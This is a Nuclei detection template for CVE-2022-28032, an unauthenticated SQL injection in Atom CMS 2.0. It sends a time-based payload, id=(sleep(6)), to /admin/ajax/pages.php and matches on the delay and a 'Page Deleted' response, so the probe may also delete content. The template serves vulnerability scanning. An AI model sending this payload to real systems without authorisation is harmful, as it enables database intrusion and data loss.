nuclei-templates/http/cves/2022/CVE-2022-28032.yaml

44 lines
1.4 KiB
YAML

id: CVE-2022-28032
info:
name: Atom CMS v2.0 - SQL Injection
author: theamanrawat
severity: critical
description: |
AtomCMS 2.0 is vulnerable to SQL Injection via Atom.CMS_admin_ajax_pages.php
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
remediation: Fixed in version Atom CMS v2.1
reference:
- https://github.com/thedigicraft/Atom.CMS/issues/263
- https://nvd.nist.gov/vuln/detail/CVE-2022-28032
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-28032
cwe-id: CWE-89
epss-score: 0.02036
epss-percentile: 0.877
cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: thedigitalcraft
product: atomcms
tags: cve,cve2022,sqli,atom,cms,thedigitalcraft
http:
- raw:
- |
@timeout: 20s
GET /admin/ajax/pages.php?id=(sleep(6)) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(body, "Page Deleted")'
condition: and
# digest: 4a0a00473045022045597c3e09c1c026f252d199389fcdc1bcc6eea1fba29a133f91e92b38393859022100c4815732d23afd0441a37eb54bd38371bf63e7cfdfc1b74d31ec87a20a5db6be:922c64590222798bb761d5b6d8e72950